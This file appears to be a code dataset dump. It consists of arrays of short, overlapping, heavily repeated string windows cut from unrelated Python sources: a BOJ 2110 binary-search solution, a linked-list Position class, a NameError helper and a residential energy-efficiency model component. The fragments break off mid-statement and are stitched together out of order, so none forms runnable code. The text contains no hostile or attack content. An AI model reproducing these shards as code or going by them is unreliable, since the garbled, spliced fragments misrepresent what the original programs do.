in range(n)] arr.sort() MIN", "# BOJ 2110 import sys si = sys.stdin.readline n, m = map(int, si().split())", "= map(int, si().split()) arr = [int(si()) for _ in range(n)] 
arr.sort() MIN =", "arr[i] - last >= gap: cnt += 1 last = arr[i] return cnt", "= sys.stdin.readline n, m = map(int, si().split()) arr = [int(si()) for _ in", "get_count(gap): cnt = 1 last = arr[0] for i in range(1, n): if", "k): while start <= end: mid = (start + end) // 2 cnt", "1 last = arr[0] for i in range(1, n): if arr[i] - last", "1 res = mid else: end = mid - 1 return res print(search(MIN,", "arr[0] for i in range(1, n): if arr[i] - last >= gap: cnt", "if arr[i] - last >= gap: cnt += 1 last = arr[i] return", "arr[-1] - arr[0] def get_count(gap): cnt = 1 last = arr[0] for i", "2110 import sys si = sys.stdin.readline n, m = map(int, si().split()) arr =", "for i in range(1, n): if arr[i] - last >= gap: cnt +=", "return cnt def search(start, end, k): while start <= end: mid = (start", "= mid + 1 res = mid else: end = mid - 1", "BOJ 2110 import sys si = sys.stdin.readline n, m = map(int, si().split()) arr", "for _ in range(n)] arr.sort() MIN = 1 MAX = arr[-1] - arr[0]", "in range(n)] arr.sort() MIN = 1 MAX = arr[-1] - arr[0] def get_count(gap):", "= arr[-1] - arr[0] def get_count(gap): cnt = 1 last = arr[0] for", "= (start + end) // 2 cnt = get_count(mid) if cnt >= k:", "= get_count(mid) if cnt >= k: start = mid + 1 res =", "+= 1 last = arr[i] return cnt def search(start, end, k): while start", "range(n)] arr.sort() MIN = 1 MAX = arr[-1] - arr[0] def get_count(gap): cnt", "sys.stdin.readline n, m = map(int, si().split()) arr = [int(si()) for _ in range(n)]", "MAX = arr[-1] - arr[0] def get_count(gap): cnt = 1 last = arr[0]", "MIN = 1 MAX = arr[-1] - arr[0] def get_count(gap): cnt = 1", "mid = (start + end) // 2 cnt = get_count(mid) if cnt >=", "i in range(1, n): if arr[i] - last >= gap: cnt += 1", "1 MAX = arr[-1] - arr[0] def get_count(gap): cnt = 1 last =", "arr[0] def get_count(gap): cnt = 1 last = arr[0] for i in range(1,", "cnt += 1 last = arr[i] return cnt def search(start, end, k): while", "arr = [int(si()) for _ in range(n)] arr.sort() MIN = 1 MAX =", 
"get_count(mid) if cnt >= k: start = mid + 1 res = mid", "= 1 last = arr[0] for i in range(1, n): if arr[i] -", "range(1, n): if arr[i] - last >= gap: cnt += 1 last =", "= arr[0] for i in range(1, n): if arr[i] - last >= gap:", "[int(si()) for _ in range(n)] arr.sort() MIN = 1 MAX = arr[-1] -", "arr.sort() MIN = 1 MAX = arr[-1] - arr[0] def get_count(gap): cnt =", "+ end) // 2 cnt = get_count(mid) if cnt >= k: start =", ">= k: start = mid + 1 res = mid else: end =", "cnt >= k: start = mid + 1 res = mid else: end", "res = mid else: end = mid - 1 return res print(search(MIN, MAX,", "si = sys.stdin.readline n, m = map(int, si().split()) arr = [int(si()) for _", "last = arr[0] for i in range(1, n): if arr[i] - last >=", "+ 1 res = mid else: end = mid - 1 return res", "(start + end) // 2 cnt = get_count(mid) if cnt >= k: start", "def search(start, end, k): while start <= end: mid = (start + end)", "1 last = arr[i] return cnt def search(start, end, k): while start <=", "si().split()) arr = [int(si()) for _ in range(n)] arr.sort() MIN = 1 MAX", "end) // 2 cnt = get_count(mid) if cnt >= k: start = mid", "search(start, end, k): while start <= end: mid = (start + end) //", "last = arr[i] return cnt def search(start, end, k): while start <= end:", "k: start = mid + 1 res = mid else: end = mid", "_ in range(n)] arr.sort() MIN = 1 MAX = arr[-1] - arr[0] def", "n, m = map(int, si().split()) arr = [int(si()) for _ in range(n)] arr.sort()", "while start <= end: mid = (start + end) // 2 cnt =" ]
[ "single element.\"\"\" def __init__(self,container,node): \"\"\"Constructor should not be invoked by the user.\"\"\" self._container", "by the user.\"\"\" self._container = container self._node = node def element(self): \"\"\"Return the", "stored at this position.\"\"\" return self._node._element def __eq__(self,other): \"\"\"Return True if other is", "the user.\"\"\" self._container = container self._node = node def element(self): \"\"\"Return the element", "element(self): \"\"\"Return the element stored at this position.\"\"\" return self._node._element def __eq__(self,other): \"\"\"Return", "location.\"\"\" return ((type(other) is type(self)) and (other._node is self._node)) def __ne__(self,other): \"\"\"Return True", "\"\"\"Return the element stored at this position.\"\"\" return self._node._element def __eq__(self,other): \"\"\"Return True", "the element stored at this position.\"\"\" return self._node._element def __eq__(self,other): \"\"\"Return True if", "<filename>CHAPTER 07 (linked_list)/position_class.py class Position: \"\"\"An abstraction representing the location of a single", "= node def element(self): \"\"\"Return the element stored at this position.\"\"\" return self._node._element", "return ((type(other) is type(self)) and (other._node is self._node)) def __ne__(self,other): \"\"\"Return True if", "not be invoked by the user.\"\"\" self._container = container self._node = node def", "element.\"\"\" def __init__(self,container,node): \"\"\"Constructor should not be invoked by the user.\"\"\" self._container =", "a single element.\"\"\" def __init__(self,container,node): \"\"\"Constructor should not be invoked by the user.\"\"\"", "return self._node._element def __eq__(self,other): \"\"\"Return True if other is a Position representing the", "if other is a Position representing the same location.\"\"\" return ((type(other) is type(self))", "the same location.\"\"\" return ((type(other) is type(self)) and (other._node is self._node)) def 
__ne__(self,other):", "does not represent the same location.\"\"\" return not(self == other) # opposite of", "\"\"\"Constructor should not be invoked by the user.\"\"\" self._container = container self._node =", "class Position: \"\"\"An abstraction representing the location of a single element.\"\"\" def __init__(self,container,node):", "a Position representing the same location.\"\"\" return ((type(other) is type(self)) and (other._node is", "not represent the same location.\"\"\" return not(self == other) # opposite of __eq__", "same location.\"\"\" return ((type(other) is type(self)) and (other._node is self._node)) def __ne__(self,other): \"\"\"Return", "07 (linked_list)/position_class.py class Position: \"\"\"An abstraction representing the location of a single element.\"\"\"", "def __init__(self,container,node): \"\"\"Constructor should not be invoked by the user.\"\"\" self._container = container", "be invoked by the user.\"\"\" self._container = container self._node = node def element(self):", "((type(other) is type(self)) and (other._node is self._node)) def __ne__(self,other): \"\"\"Return True if other", "other does not represent the same location.\"\"\" return not(self == other) # opposite", "representing the location of a single element.\"\"\" def __init__(self,container,node): \"\"\"Constructor should not be", "user.\"\"\" self._container = container self._node = node def element(self): \"\"\"Return the element stored", "True if other is a Position representing the same location.\"\"\" return ((type(other) is", "element stored at this position.\"\"\" return self._node._element def __eq__(self,other): \"\"\"Return True if other", "def element(self): \"\"\"Return the element stored at this position.\"\"\" return self._node._element def __eq__(self,other):", "container self._node = node def element(self): \"\"\"Return the element stored at this position.\"\"\"", "\"\"\"Return True if other is a Position representing the same location.\"\"\" return 
((type(other)", "other is a Position representing the same location.\"\"\" return ((type(other) is type(self)) and", "def __ne__(self,other): \"\"\"Return True if other does not represent the same location.\"\"\" return", "should not be invoked by the user.\"\"\" self._container = container self._node = node", "__init__(self,container,node): \"\"\"Constructor should not be invoked by the user.\"\"\" self._container = container self._node", "= container self._node = node def element(self): \"\"\"Return the element stored at this", "Position: \"\"\"An abstraction representing the location of a single element.\"\"\" def __init__(self,container,node): \"\"\"Constructor", "node def element(self): \"\"\"Return the element stored at this position.\"\"\" return self._node._element def", "is self._node)) def __ne__(self,other): \"\"\"Return True if other does not represent the same", "self._node._element def __eq__(self,other): \"\"\"Return True if other is a Position representing the same", "invoked by the user.\"\"\" self._container = container self._node = node def element(self): \"\"\"Return", "representing the same location.\"\"\" return ((type(other) is type(self)) and (other._node is self._node)) def", "abstraction representing the location of a single element.\"\"\" def __init__(self,container,node): \"\"\"Constructor should not", "def __eq__(self,other): \"\"\"Return True if other is a Position representing the same location.\"\"\"", "the location of a single element.\"\"\" def __init__(self,container,node): \"\"\"Constructor should not be invoked", "\"\"\"An abstraction representing the location of a single element.\"\"\" def __init__(self,container,node): \"\"\"Constructor should", "self._container = container self._node = node def element(self): \"\"\"Return the element stored at", "self._node = node def element(self): \"\"\"Return the element stored at this position.\"\"\" return", "position.\"\"\" return self._node._element def __eq__(self,other): \"\"\"Return 
True if other is a Position representing", "location of a single element.\"\"\" def __init__(self,container,node): \"\"\"Constructor should not be invoked by", "True if other does not represent the same location.\"\"\" return not(self == other)", "\"\"\"Return True if other does not represent the same location.\"\"\" return not(self ==", "at this position.\"\"\" return self._node._element def __eq__(self,other): \"\"\"Return True if other is a", "this position.\"\"\" return self._node._element def __eq__(self,other): \"\"\"Return True if other is a Position", "self._node)) def __ne__(self,other): \"\"\"Return True if other does not represent the same location.\"\"\"", "(other._node is self._node)) def __ne__(self,other): \"\"\"Return True if other does not represent the", "if other does not represent the same location.\"\"\" return not(self == other) #", "__eq__(self,other): \"\"\"Return True if other is a Position representing the same location.\"\"\" return", "Position representing the same location.\"\"\" return ((type(other) is type(self)) and (other._node is self._node))", "type(self)) and (other._node is self._node)) def __ne__(self,other): \"\"\"Return True if other does not", "is a Position representing the same location.\"\"\" return ((type(other) is type(self)) and (other._node", "and (other._node is self._node)) def __ne__(self,other): \"\"\"Return True if other does not represent", "is type(self)) and (other._node is self._node)) def __ne__(self,other): \"\"\"Return True if other does", "of a single element.\"\"\" def __init__(self,container,node): \"\"\"Constructor should not be invoked by the", "(linked_list)/position_class.py class Position: \"\"\"An abstraction representing the location of a single element.\"\"\" def", "__ne__(self,other): \"\"\"Return True if other does not represent the same location.\"\"\" return not(self" ]
[ "'([_\\w]+)' referenced before assignment$\", oException.args[0]); if not oUnboundLocalErrorMessageMatch: return {}; sVariableName = oUnboundLocalErrorMessageMatch.group(1);", "oNameErrorMessageMatch: return {}; sVariableName = oNameErrorMessageMatch.group(1); if sVariableName != oException.name: return {}; #", "{}; sVariableName = oNameErrorMessageMatch.group(1); if sVariableName != oException.name: return {}; # Sanity check.", "def fdxExceptionDetailsForNameError(oException): if len(oException.args) != 1: return {}; if isinstance(oException, UnboundLocalError): oUnboundLocalErrorMessageMatch =", "oUnboundLocalErrorMessageMatch.group(1); sProblemDescription = \"Uninitialised variable\"; else: oNameErrorMessageMatch = re.match(r\"^(?:global )?name '([_\\w]+)' is not", "not defined$\", oException.args[0]); if not oNameErrorMessageMatch: return {}; sVariableName = oNameErrorMessageMatch.group(1); if sVariableName", "\"aasConsoleOutputLines\": [ [ guExceptionInformationColor, sProblemDescription, \" \", guExceptionInformationHighlightColor, sVariableName, guExceptionInformationColor, \".\", ], ],", "referenced before assignment$\", oException.args[0]); if not oUnboundLocalErrorMessageMatch: return {}; sVariableName = oUnboundLocalErrorMessageMatch.group(1); sProblemDescription", "isinstance(oException, UnboundLocalError): oUnboundLocalErrorMessageMatch = re.match(r\"^local variable '([_\\w]+)' referenced before assignment$\", oException.args[0]); if not", "guExceptionInformationColor, sProblemDescription, \" \", guExceptionInformationHighlightColor, sVariableName, guExceptionInformationColor, \".\", ], ], \"dxHiddenProperties\": { \"args\":", "= oNameErrorMessageMatch.group(1); if sVariableName != oException.name: return {}; # Sanity check. 
sProblemDescription =", "\".\", ], ], \"dxHiddenProperties\": { \"args\": oException.args, \"name\": oException.name, \"with_traceback\": oException.with_traceback, }, };", "sVariableName = oUnboundLocalErrorMessageMatch.group(1); sProblemDescription = \"Uninitialised variable\"; else: oNameErrorMessageMatch = re.match(r\"^(?:global )?name '([_\\w]+)'", "Sanity check. sProblemDescription = \"Undefined variable\"; return { \"aasConsoleOutputLines\": [ [ guExceptionInformationColor, sProblemDescription,", "\" \", guExceptionInformationHighlightColor, sVariableName, guExceptionInformationColor, \".\", ], ], \"dxHiddenProperties\": { \"args\": oException.args, \"name\":", "!= 1: return {}; if isinstance(oException, UnboundLocalError): oUnboundLocalErrorMessageMatch = re.match(r\"^local variable '([_\\w]+)' referenced", "if not oNameErrorMessageMatch: return {}; sVariableName = oNameErrorMessageMatch.group(1); if sVariableName != oException.name: return", "guExceptionInformationHighlightColor, sVariableName, guExceptionInformationColor, \".\", ], ], \"dxHiddenProperties\": { \"args\": oException.args, \"name\": oException.name, \"with_traceback\":", "{}; if isinstance(oException, UnboundLocalError): oUnboundLocalErrorMessageMatch = re.match(r\"^local variable '([_\\w]+)' referenced before assignment$\", oException.args[0]);", "else: oNameErrorMessageMatch = re.match(r\"^(?:global )?name '([_\\w]+)' is not defined$\", oException.args[0]); if not oNameErrorMessageMatch:", "re.match(r\"^local variable '([_\\w]+)' referenced before assignment$\", oException.args[0]); if not oUnboundLocalErrorMessageMatch: return {}; sVariableName", "check. 
sProblemDescription = \"Undefined variable\"; return { \"aasConsoleOutputLines\": [ [ guExceptionInformationColor, sProblemDescription, \"", "oUnboundLocalErrorMessageMatch = re.match(r\"^local variable '([_\\w]+)' referenced before assignment$\", oException.args[0]); if not oUnboundLocalErrorMessageMatch: return", "len(oException.args) != 1: return {}; if isinstance(oException, UnboundLocalError): oUnboundLocalErrorMessageMatch = re.match(r\"^local variable '([_\\w]+)'", "= re.match(r\"^local variable '([_\\w]+)' referenced before assignment$\", oException.args[0]); if not oUnboundLocalErrorMessageMatch: return {};", "\"Uninitialised variable\"; else: oNameErrorMessageMatch = re.match(r\"^(?:global )?name '([_\\w]+)' is not defined$\", oException.args[0]); if", "], ], \"dxHiddenProperties\": { \"args\": oException.args, \"name\": oException.name, \"with_traceback\": oException.with_traceback, }, }; from", "sProblemDescription = \"Uninitialised variable\"; else: oNameErrorMessageMatch = re.match(r\"^(?:global )?name '([_\\w]+)' is not defined$\",", "not oNameErrorMessageMatch: return {}; sVariableName = oNameErrorMessageMatch.group(1); if sVariableName != oException.name: return {};", "oUnboundLocalErrorMessageMatch: return {}; sVariableName = oUnboundLocalErrorMessageMatch.group(1); sProblemDescription = \"Uninitialised variable\"; else: oNameErrorMessageMatch =", "= \"Uninitialised variable\"; else: oNameErrorMessageMatch = re.match(r\"^(?:global )?name '([_\\w]+)' is not defined$\", oException.args[0]);", "'([_\\w]+)' is not defined$\", oException.args[0]); if not oNameErrorMessageMatch: return {}; sVariableName = oNameErrorMessageMatch.group(1);", "sVariableName != oException.name: return {}; # Sanity check. 
sProblemDescription = \"Undefined variable\"; return", "= oUnboundLocalErrorMessageMatch.group(1); sProblemDescription = \"Uninitialised variable\"; else: oNameErrorMessageMatch = re.match(r\"^(?:global )?name '([_\\w]+)' is", ")?name '([_\\w]+)' is not defined$\", oException.args[0]); if not oNameErrorMessageMatch: return {}; sVariableName =", "oException.args[0]); if not oUnboundLocalErrorMessageMatch: return {}; sVariableName = oUnboundLocalErrorMessageMatch.group(1); sProblemDescription = \"Uninitialised variable\";", "assignment$\", oException.args[0]); if not oUnboundLocalErrorMessageMatch: return {}; sVariableName = oUnboundLocalErrorMessageMatch.group(1); sProblemDescription = \"Uninitialised", "{ \"args\": oException.args, \"name\": oException.name, \"with_traceback\": oException.with_traceback, }, }; from ..mColorsAndChars import *;", "!= oException.name: return {}; # Sanity check. sProblemDescription = \"Undefined variable\"; return {", "return {}; sVariableName = oUnboundLocalErrorMessageMatch.group(1); sProblemDescription = \"Uninitialised variable\"; else: oNameErrorMessageMatch = re.match(r\"^(?:global", "re; def fdxExceptionDetailsForNameError(oException): if len(oException.args) != 1: return {}; if isinstance(oException, UnboundLocalError): oUnboundLocalErrorMessageMatch", "[ [ guExceptionInformationColor, sProblemDescription, \" \", guExceptionInformationHighlightColor, sVariableName, guExceptionInformationColor, \".\", ], ], \"dxHiddenProperties\":", "= re.match(r\"^(?:global )?name '([_\\w]+)' is not defined$\", oException.args[0]); if not oNameErrorMessageMatch: return {};", "is not defined$\", oException.args[0]); if not oNameErrorMessageMatch: return {}; sVariableName = oNameErrorMessageMatch.group(1); if", "return {}; if isinstance(oException, UnboundLocalError): oUnboundLocalErrorMessageMatch = re.match(r\"^local variable '([_\\w]+)' referenced before assignment$\",", "\"dxHiddenProperties\": { \"args\": oException.args, \"name\": 
oException.name, \"with_traceback\": oException.with_traceback, }, }; from ..mColorsAndChars import", "sVariableName, guExceptionInformationColor, \".\", ], ], \"dxHiddenProperties\": { \"args\": oException.args, \"name\": oException.name, \"with_traceback\": oException.with_traceback,", "= \"Undefined variable\"; return { \"aasConsoleOutputLines\": [ [ guExceptionInformationColor, sProblemDescription, \" \", guExceptionInformationHighlightColor,", "variable\"; else: oNameErrorMessageMatch = re.match(r\"^(?:global )?name '([_\\w]+)' is not defined$\", oException.args[0]); if not", "guExceptionInformationColor, \".\", ], ], \"dxHiddenProperties\": { \"args\": oException.args, \"name\": oException.name, \"with_traceback\": oException.with_traceback, },", "# Sanity check. sProblemDescription = \"Undefined variable\"; return { \"aasConsoleOutputLines\": [ [ guExceptionInformationColor,", "[ guExceptionInformationColor, sProblemDescription, \" \", guExceptionInformationHighlightColor, sVariableName, guExceptionInformationColor, \".\", ], ], \"dxHiddenProperties\": {", "not oUnboundLocalErrorMessageMatch: return {}; sVariableName = oUnboundLocalErrorMessageMatch.group(1); sProblemDescription = \"Uninitialised variable\"; else: oNameErrorMessageMatch", "{ \"aasConsoleOutputLines\": [ [ guExceptionInformationColor, sProblemDescription, \" \", guExceptionInformationHighlightColor, sVariableName, guExceptionInformationColor, \".\", ],", "sVariableName = oNameErrorMessageMatch.group(1); if sVariableName != oException.name: return {}; # Sanity check. 
sProblemDescription", "return { \"aasConsoleOutputLines\": [ [ guExceptionInformationColor, sProblemDescription, \" \", guExceptionInformationHighlightColor, sVariableName, guExceptionInformationColor, \".\",", "import re; def fdxExceptionDetailsForNameError(oException): if len(oException.args) != 1: return {}; if isinstance(oException, UnboundLocalError):", "if isinstance(oException, UnboundLocalError): oUnboundLocalErrorMessageMatch = re.match(r\"^local variable '([_\\w]+)' referenced before assignment$\", oException.args[0]); if", "oNameErrorMessageMatch = re.match(r\"^(?:global )?name '([_\\w]+)' is not defined$\", oException.args[0]); if not oNameErrorMessageMatch: return", "if len(oException.args) != 1: return {}; if isinstance(oException, UnboundLocalError): oUnboundLocalErrorMessageMatch = re.match(r\"^local variable", "before assignment$\", oException.args[0]); if not oUnboundLocalErrorMessageMatch: return {}; sVariableName = oUnboundLocalErrorMessageMatch.group(1); sProblemDescription =", "defined$\", oException.args[0]); if not oNameErrorMessageMatch: return {}; sVariableName = oNameErrorMessageMatch.group(1); if sVariableName !=", "variable\"; return { \"aasConsoleOutputLines\": [ [ guExceptionInformationColor, sProblemDescription, \" \", guExceptionInformationHighlightColor, sVariableName, guExceptionInformationColor,", "<gh_stars>1-10 import re; def fdxExceptionDetailsForNameError(oException): if len(oException.args) != 1: return {}; if isinstance(oException,", "1: return {}; if isinstance(oException, UnboundLocalError): oUnboundLocalErrorMessageMatch = re.match(r\"^local variable '([_\\w]+)' referenced before", "oException.args[0]); if not oNameErrorMessageMatch: return {}; sVariableName = oNameErrorMessageMatch.group(1); if sVariableName != oException.name:", "return {}; # Sanity check. 
sProblemDescription = \"Undefined variable\"; return { \"aasConsoleOutputLines\": [", "sProblemDescription, \" \", guExceptionInformationHighlightColor, sVariableName, guExceptionInformationColor, \".\", ], ], \"dxHiddenProperties\": { \"args\": oException.args,", "{}; sVariableName = oUnboundLocalErrorMessageMatch.group(1); sProblemDescription = \"Uninitialised variable\"; else: oNameErrorMessageMatch = re.match(r\"^(?:global )?name", "{}; # Sanity check. sProblemDescription = \"Undefined variable\"; return { \"aasConsoleOutputLines\": [ [", "], \"dxHiddenProperties\": { \"args\": oException.args, \"name\": oException.name, \"with_traceback\": oException.with_traceback, }, }; from ..mColorsAndChars", "\", guExceptionInformationHighlightColor, sVariableName, guExceptionInformationColor, \".\", ], ], \"dxHiddenProperties\": { \"args\": oException.args, \"name\": oException.name,", "sProblemDescription = \"Undefined variable\"; return { \"aasConsoleOutputLines\": [ [ guExceptionInformationColor, sProblemDescription, \" \",", "\"Undefined variable\"; return { \"aasConsoleOutputLines\": [ [ guExceptionInformationColor, sProblemDescription, \" \", guExceptionInformationHighlightColor, sVariableName,", "variable '([_\\w]+)' referenced before assignment$\", oException.args[0]); if not oUnboundLocalErrorMessageMatch: return {}; sVariableName =", "if not oUnboundLocalErrorMessageMatch: return {}; sVariableName = oUnboundLocalErrorMessageMatch.group(1); sProblemDescription = \"Uninitialised variable\"; else:", "if sVariableName != oException.name: return {}; # Sanity check. sProblemDescription = \"Undefined variable\";", "oException.name: return {}; # Sanity check. 
sProblemDescription = \"Undefined variable\"; return { \"aasConsoleOutputLines\":", "UnboundLocalError): oUnboundLocalErrorMessageMatch = re.match(r\"^local variable '([_\\w]+)' referenced before assignment$\", oException.args[0]); if not oUnboundLocalErrorMessageMatch:", "re.match(r\"^(?:global )?name '([_\\w]+)' is not defined$\", oException.args[0]); if not oNameErrorMessageMatch: return {}; sVariableName", "return {}; sVariableName = oNameErrorMessageMatch.group(1); if sVariableName != oException.name: return {}; # Sanity", "fdxExceptionDetailsForNameError(oException): if len(oException.args) != 1: return {}; if isinstance(oException, UnboundLocalError): oUnboundLocalErrorMessageMatch = re.match(r\"^local", "oNameErrorMessageMatch.group(1); if sVariableName != oException.name: return {}; # Sanity check. sProblemDescription = \"Undefined" ]
[ "stage.append(i) print(f'{num} is a Unique Number.') num = input('Enter the number: ') check(num)", "[] for i in num: if i in stage: print(f\"{num} is not a", "= [] for i in num: if i in stage: print(f\"{num} is not", "Unique Number.\") return stage.append(i) print(f'{num} is a Unique Number.') num = input('Enter the", "for i in num: if i in stage: print(f\"{num} is not a Unique", "in stage: print(f\"{num} is not a Unique Number.\") return stage.append(i) print(f'{num} is a", "stage = [] for i in num: if i in stage: print(f\"{num} is", "i in num: if i in stage: print(f\"{num} is not a Unique Number.\")", "not a Unique Number.\") return stage.append(i) print(f'{num} is a Unique Number.') num =", "i in stage: print(f\"{num} is not a Unique Number.\") return stage.append(i) print(f'{num} is", "print(f\"{num} is not a Unique Number.\") return stage.append(i) print(f'{num} is a Unique Number.')", "return stage.append(i) print(f'{num} is a Unique Number.') num = input('Enter the number: ')", "check(num): stage = [] for i in num: if i in stage: print(f\"{num}", "in num: if i in stage: print(f\"{num} is not a Unique Number.\") return", "num: if i in stage: print(f\"{num} is not a Unique Number.\") return stage.append(i)", "stage: print(f\"{num} is not a Unique Number.\") return stage.append(i) print(f'{num} is a Unique", "def check(num): stage = [] for i in num: if i in stage:", "a Unique Number.\") return stage.append(i) print(f'{num} is a Unique Number.') num = input('Enter", "if i in stage: print(f\"{num} is not a Unique Number.\") return stage.append(i) print(f'{num}", "is not a Unique Number.\") return stage.append(i) print(f'{num} is a Unique Number.') num", "Number.\") return stage.append(i) print(f'{num} is a Unique Number.') num = input('Enter the number:" ]
[ "price of offset heating fuels. The cost to retrofit each home is also", "self.baseline_fuel_kWh_consumption/constants.mmbtu_to_kWh r_elec = self.proposed_fuel_kWh_consumption/constants.mmbtu_to_kWh s_elec = b_elec - r_elec b_elec_cost = self.baseline_fuel_kWh_consumption *", "b_elec = self.baseline_fuel_kWh_consumption/constants.mmbtu_to_kWh r_elec = self.proposed_fuel_kWh_consumption/constants.mmbtu_to_kWh s_elec = b_elec - r_elec b_elec_cost =", "opportunities Attributes ---------- opportunity_HH : int Houses that can be retrofit savings_HF :", "s_oil, \"Residential: Heating Oil (gallons/year) Cost Baseline\": b_oil_cost, \"Residential: Heating Oil (gallons/year) Cost", "> 1 and tag[1] != 'residential': self.was_run = False self.reason = \"Not a", "#~ r_con = self.forecast.base_res_consumption avg_con = float(self.comp_specs['data']['average kWh per house']) if not self.intertie_data", "ResidentialBuildings(AnnualSavings): \"\"\"Residential energy efficiency component of the Alaska Affordable Energy Model: This module", "calc_proposed_fuel_consumption (self): \"\"\"Calculate the proposed heating fuel consumption Attributes ---------- proposed_fuel_Hoil_consumption : np.array", "(self): \"\"\"calculate the proposed kWh consumption for a community Attributes ---------- proposed_kWh_consumption :", "proposed electricity cost \"\"\" kWh_cost = self.cd[\"electric prices\"].\\ ix[self.start_year:self.end_year] kWh_cost = kWh_cost.T.values[0] #", "Object aaem.forecast : forecast module, see information on Forecast Object aaem.diagnostics : diagnostics", "value: forecast cd : dictionary general data for a community. 
Initial value: 'community'", "rd = self.comp_specs['data'] ## #HH self.opportunity_HH = self.init_HH -rd[\"BEES Number\"] -rd[\"Post-Retrofit Number\"] self.opportunity_HH", "100.0 percent_accounted += amnt self.init_kWh = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_kWh) #~ self.init_coal #~", "= self.baseline_fuel_Hoil_consumption * HF_price r_oil_cost = self.proposed_fuel_Hoil_consumption * HF_price s_oil_cost = b_oil_cost -", "multiplier' ) self.set_project_life_details( self.comp_specs[\"start year\"], self.comp_specs[\"lifetime\"] ) yr = int(self.comp_specs['data']['Year']) self.base_pop = int(self.forecast.population.ix[yr])#.values[0][0]", "#~ self.percent_savings = np.float64( self.percent_savings) area = np.float64(rd[\"Pre-Retrofit Avg Area (SF)\"]) EUI =", "Heating Propane (gallons/year) Cost Post Retrofit\": r_LP_cost, \"Residential: Heating Propane (gallons/year) Cost Savings\":", "(self, scalers = {'capital costs':1.0}): \"\"\"Runs the component. The Annual Total Savings,Annual Costs,", "consumption proposed_fuel_gas_consumption : np.array proposed natural gas consumption proposed_fuel_kWh_consumption : np.array proposed electric", "self.start_year df = DataFrame({ \"Residential: Heating Fuel All (MMBtu/year) Consumption Baseline\": self.get_base_HF_use(), \"Residential:", "Gas (Mcf/year) Consumption Savings\", \"Residential: Heating Fuel All (MMBtu/year) Consumption Baseline\", \"Residential: Heating", "Gas (Mcf/year) Consumption Post Retrofit\", \"Residential: Heating Natural Gas (Mcf/year) Consumption Savings\", \"Residential:", "of fuel \"\"\" HH_consumption = HH * self.avg_kWh_consumption_per_HH * \\ constants.kWh_to_mmbtu return np.float64(fuel_amnt", "are based on the number of units that have not been retrofit as", "HH = self.comp_specs['data']['Total Occupied'] pop = self.forecast.base_pop self.init_HH = int(round(HH*(val / pop))) def", "= (self.diesel_prices + self.cd['heating fuel premium']) self.hoil_price = HF_price 
wood_price = self.cd['cordwood price']", "in the base and proposed fuel costs \"\"\" self.annual_electric_savings = np.zeros(self.project_life) def calc_annual_heating_savings", "All (MMBtu/year) Cost Savings\": self.get_heating_savings_costs(), \"Residential: Heating Oil (gallons/year) Consumption Baseline\": b_oil, \"Residential:", "(Mcf/year) Cost Baseline\", \"Residential: Heating Natural Gas (Mcf/year) Cost Post Retrofit\", \"Residential: Heating", "electric summary\"].values[0] if self.cd[\"model electricity\"]: self.elec_prices = community_data.get_item('community', 'electric prices') self.comp_specs = community_data.get_section(COMPONENT_NAME)", "= int(self.comp_specs['data']['Year']) self.base_pop = int(self.forecast.population.ix[yr])#.values[0][0] peps_per_house = float(self.base_pop) / \\ self.comp_specs['data']['Total Occupied'] households", "\"\"\" self.capital_costs = self.opportunity_HH * self.refit_cost_rate def calc_annual_electric_savings (self): \"\"\"calculate annual electric savings", "yr = int(self.comp_specs['data']['Year']) self.base_pop = int(self.forecast.population.ix[yr])#.values[0][0] peps_per_house = float(self.base_pop) / \\ self.comp_specs['data']['Total Occupied']", "self.elec_prices = community_data.get_item('community', 'electric prices') self.comp_specs = community_data.get_section(COMPONENT_NAME) self.component_name = COMPONENT_NAME self.forecast =", "calc_init_consumption (self): \"\"\"Calculate the initial consumption for each fuel type. Attributes ---------- init_HF", "= self.elec_prices[self.start_year-self.start_year: self.end_year-self.start_year] LP_price = self.cd['propane price'] gas_price = self.cd['natural gas price'] self.baseline_HF_cost", "and Internal Rate of Return will all be calculated. 
There must be a", "constants.mmbtu_to_cords) amnt = np.float64(rd[\"Utility Gas\"]) / 100.0 self.savings_gas = avg_EUI_reduction * self.opportunity_HH *", "df.columns[:-2].tolist()] fname = os.path.join(directory, self.cd['name'] + '_' +\\ self.component_name.lower() + \"_output.csv\") fname =", "scalers['capital costs']) self.calc_annual_net_benefit() self.calc_npv(self.cd['discount rate'], self.cd['current year']) self.calc_levelized_costs(0) def get_fuel_total_saved (self): \"\"\"Get total", "self.init_HH) * area * EUI self.baseline_fuel_Hoil_consumption = \\ self.init_HF+np.float64(rd[\"Fuel Oil\"]/100.0)*\\ scaler * constants.mmbtu_to_gal_HF", "heating fuel consumption Attributes ---------- proposed_fuel_Hoil_consumption : np.array proposed heating oil consumption proposed_fuel_wood_consumption", "the project Attributes ---------- init_HH : int estimated households for first year of", "except ValueError: pass df = df[[ \"Residential: Heating Oil (gallons/year) Consumption Baseline\", \"Residential:", "False Notes ----- Accepted scalers: capital costs. 
\"\"\" self.was_run = True self.reason =", "* EUI # the one in each of these function calls is an", "self.savings_LP* (1/constants.mmbtu_to_gal_LP) def calc_consumption_by_fuel (self, fuel_amnt, total_consumption, HH, cf): \"\"\"calculate consumption by fuel", "of community_data See also -------- aaem.community_data : community data module, see information on", "consumption proposed_fuel_LP_consumption : np.array proposed LP consumption proposed_fuel_gas_consumption : np.array proposed natural gas", "Baseline\": b_NG, \"Residential: Heating Natural Gas (Mcf/year) Consumption Post Retrofit\": r_NG, \"Residential: Heating", "= self.forecast.base_pop self.init_HH = int(round(HH*(val / pop))) def calc_init_consumption (self): \"\"\"Calculate the initial", "(self): \"\"\"calculate base line heating fuel costs Attributes ---------- baseline_HF_cost : np.array baseline", "0: self.baseline_fuel_gas_consumption = 0 self.baseline_HF_consumption = \\ self.baseline_fuel_Hoil_consumption * \\ (1/constants.mmbtu_to_gal_HF) +\\ self.baseline_fuel_wood_consumption", "= self.intertie_data.get_item( 'Residential Energy Efficiency', 'data' )['average kWh per house'] #~ self.avg_monthly_consumption =", "gas_price s_NG_cost = b_NG_cost - r_NG_cost years = np.array(range(self.project_life)) + self.start_year df =", "Consumption Post Retrofit\": r_bio, \"Residential: Heating Biomass (cords/year) Consumption Savings\": s_bio, \"Residential: Heating", "data this component has no prerequisites leave empty Attributes ---------- diagnostics : diagnostics", "path output directory \"\"\" if not self.was_run: return if self.cd[\"model financial\"]: HF_price =", "self.savings_LP = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_gal_LP) amnt =", "Savings\": s_NG, \"Residential: Heating Natural Gas (Mcf/year) 